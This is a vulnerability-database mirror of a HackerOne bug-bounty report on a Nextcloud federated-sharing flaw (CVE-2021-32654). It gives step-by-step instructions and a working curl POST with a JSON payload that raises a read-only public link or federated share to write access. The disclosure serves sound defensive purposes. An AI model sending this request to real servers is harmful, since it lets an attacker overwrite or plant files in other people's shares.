Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
hackeroneRtodH1:1170024
HistoryApr 20, 2021 - 8:48 p.m.

Nextcloud: Attacker can obtain write access to any federated share/public link

2021-04-2020:48:20
rtod
hackerone.com
$4000
17

0.001 Low

EPSS

Percentile

49.1%

JSON

Hi mates,

I stumbled across this with public links. But the same holds true for any federated share. I will try to describe the link scenario.
At first I thought there were more steps (and resharing was involved). But it really is very simples:

  1. An attacker obtains a public link (again plenty of those around). For the sake of the attack it is a read only public link
  2. The attacker uses the ‘add to my nextcloud’ functionality to have a federated share created to their own instance
  3. The attacker accepts this share
  4. Now the attacker checks their database and finds the entry in the oc_share_external table.

We are looking for really only the remote id. And the token.
For the sake of this example the remote id = 2 and the token = nOxdNJkb1xbI1VX

  1. Now we craft our request
curl -v -X POST http://localhost/index.php/ocm/notifications -d '{"notificationType":"RESHARE_CHANGE_PERMISSION","resourceType":"file","providerId":2,"notification":{"sharedSecret":"nOxdNJkb1xbI1VX","permission":["read","write","share"]}}' -H 'Content-type: application/json'

To break this down.
We send an (anonymous) POST request to the victims server to be precise to index.php/ocm/notifications
And we pass it the following json

{
   "notificationType":"RESHARE_CHANGE_PERMISSION",
   "resourceType":"file",
   "providerId":2,
   "notification":{
      "sharedSecret":"nOxdNJkb1xbI1VX",
      "permission":[
         "read",
         "write",
         "share"
      ]
   }
}
  1. The attacker now enjoys their federated share with READ+WRITE+UPDATE+CREATE+SHARE access. (I think it is probably even a bug that there is no way to grant DELETE).

Since we create a federated share at step 1. This also holds true for any created federated share.

Impact

In short if an attacker has a public link. Or a federated share with them they can elevate their permissions very easily.

This allows them to overwrite files. Add new files. And so on. In short the integrity of all files in public links and federated shares should be considered compromised.

Pardon my directness. But you really should take a serious look at your federation code. As it seems to miss checks all over the place. Maybe recommending everybody to disable it for now is the best course of action.

Related

nvd 1
cve 1
nextcloud 1
prion 1
osv 1
cvelist 1
openvas 1
nessus 1
gentoo 1
nvd
nvd
CVE-2021-32654
2021-06-01 21:15:07
cve
cve
CVE-2021-32654
2021-06-01 21:15:07
nextcloud
nextcloud
Attacker can obtain write access to any federated share/public link
2021-06-01 18:13:16
prion
prion
Design/Logic Flaw
2021-06-01 21:15:00
osv
osv
CVE-2021-32654
2021-06-01 21:15:07
cvelist
cvelist
CVE-2021-32654 Attacker can obtain write access to any federated share/public link
2021-06-01 20:45:12
openvas
openvas
Nextcloud Server Multiple Vulnerabilities (May 2021)
2021-06-02 00:00:00
nessus
nessus
GLSA-202208-17 : Nextcloud: Multiple Vulnerabilities
2022-08-16 00:00:00
gentoo
gentoo
Nextcloud: Multiple Vulnerabilities
2022-08-10 00:00:00

0.001 Low

EPSS

Percentile

49.1%

JSON
Related for H1:1170024
nvd1cve1nextcloud1prion1osv1cvelist1openvas1nessus1gentoo1